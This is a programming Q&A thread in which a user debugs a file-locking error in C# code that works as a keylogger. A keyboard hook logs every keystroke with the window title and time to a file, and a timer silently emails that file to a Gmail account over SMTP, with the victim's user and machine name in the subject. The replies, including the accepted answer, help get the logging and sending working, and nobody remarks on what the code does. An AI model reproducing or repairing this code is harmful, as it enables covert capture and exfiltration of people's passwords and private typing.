# C# System.IO.IOException occurred HResult=0x80070020

Tags: c#, file, gmail

New issue with my code, worked 100% last night. This morning it's giving me issues. (nothing changed)

When I run my code to send a file to Gmail, I get a

> System.IO.IOException occurred  HResult=0x80070020

But when I comment out the sending of the email ( see code) it works fine. I'm unsure on what happened.

**Code:**

```
public static void sendEMailThroughGmail(Object source, ElapsedEventArgs e)
    {

          try
          {
              MailMessage mM = new MailMessage();
              mM.From = new MailAddress("username@gmail.com");
              mM.To.Add("username@gmail.com");
              mM.Subject = Environment.UserName + " / " + Environment.MachineName;
              mM.Attachments.Add(new Attachment(path));
              mM.Body = "Nothing";
             mM.IsBodyHtml = true;
             SmtpClient sC = new SmtpClient("smtp.gmail.com");
              sC.Port = 587;
             sC.Credentials = new NetworkCredential("username@gmail.com", "password");
            sC.EnableSsl = true;
             sC.Send(mM);
         }
         catch (Exception)
        {

        }

        //File.Delete(path);

    }
```

the other part of the program that writes to the file is

```
private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam)
    {

        int KeyCode = Marshal.ReadInt32(lParam);
        using (StreamWriter sw = new StreamWriter(path, true))
        {

                sw.AutoFlush = true;

            if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN)


                if (!string.IsNullOrEmpty(active) && active != getTitle())
                {
                    active = getTitle();
                    sw.WriteLine();
                    sw.WriteLine("Time: " + DateTime.Now.ToShortTimeString() + " Date: " + DateTime.Now.ToShortDateString() + " Window: " + active + " -   ");
                    sw.Write((Keys)KeyCode);

                }

                else if (string.IsNullOrEmpty(active))
                {
                    active = getTitle();
                    //sw.WriteLine();
                    sw.WriteLine("Time: " + DateTime.Now.ToShortTimeString() + " Date: " + DateTime.Now.ToShortDateString() + " Window: " + active + " -   ");
                    sw.Write((Keys)KeyCode);

                }
                else
                {
                    sw.Write((Keys)KeyCode);

                }



        }
        return CallNextHookEx(_hookID, nCode, wParam, lParam);

    }
```

Comment: Please [edit] your question to remove the sensitive information

Comment: I"m not seeing an assignment to `path`, does it exist? alos, is that a proper email address and password?

Comment: remove the credential parts... you are gonna get hijacked

Comment: He should have it removed now.

Comment: @vipersassassin you shouldn't be trying to login in to his account! Even if he his stupid enough to put the credentials up publicly.

Comment: yeah I noticed that Right after I posted this question. also changed password etc. Should be ok.

Comment: the revision with the credentials in has been redacted - they shouldn't show any more (even in the history view)

Comment: Questions that metamorphose are discouraged here, as are questions that start with lists of updates. Most of your readers will be new readers, and the latter format is so confusing that it is not likely to be of help to them. I've rolled back to the last version in which the question did not have edits at the start. If you would like to add any edits back in _at the end_ then please do so, but consider (a) are they new questions? and (b) do they invalidate any existing answers?

Comment: We do not use [solved] title hacks either, since we have an acceptance system. If you have an answer, please post it below, and if you want to know why it worked (or why another version did not) then please ask a separate question (linking here if you wish). The guiding principle when posting is "have I made this understandable for a reader six months from now?".

Answer (score 0, accepted):

Issue is fixed, what happened was my timer was setup wrong. I assumed the timer interval was seconds, not milliseconds.. so the timer was keeping the file to "busy". so the codes fine. thank you all for your help.

Answer (score 0):

I think it cant delete file because it is in use. Try to add "using" to dispose MailMessage object:

```
try
{
    using(MailMessage mM = new MailMessage())
    {
        // your code
    }
    File.Delete(path);
}
catch (Exception)
{
    // your code
}
```

Comment: Still comes up with the same msg "System.IO.IOException: 'The process cannot access the file " it highlights the second code in my post."using (StreamWriter sw = new StreamWriter(path, true))"

Comment: Your file must be in use in other process. Maybe this will help you http://stackoverflow.com/a/937558/5358389

Comment: What I still cant wrap my head around is that this worked 100% last night, all I did was close the program and go to bed, woke up this morning to this issue. i'll check out the link and see what I can figure out. makes no sense.

Comment: when it gets to the "using (StreamWriter sw = new StreamWriter(path, true))" the "System.IO.IOException " is thrown. it seems almost as if the file is trying to be sent while still being written to.

Comment: Another way to check witch processes are using your file is: https://superuser.com/questions/117902/find-out-which-process-is-locking-a-file-or-folder-in-windows

Comment: looks to be "using (StreamWriter sw = new StreamWriter(path, true))" but why would this work one day and another day it doesn't?

Comment: Nothing else is using the file in the code, so it has to be the code itself. any idea on where I go from here?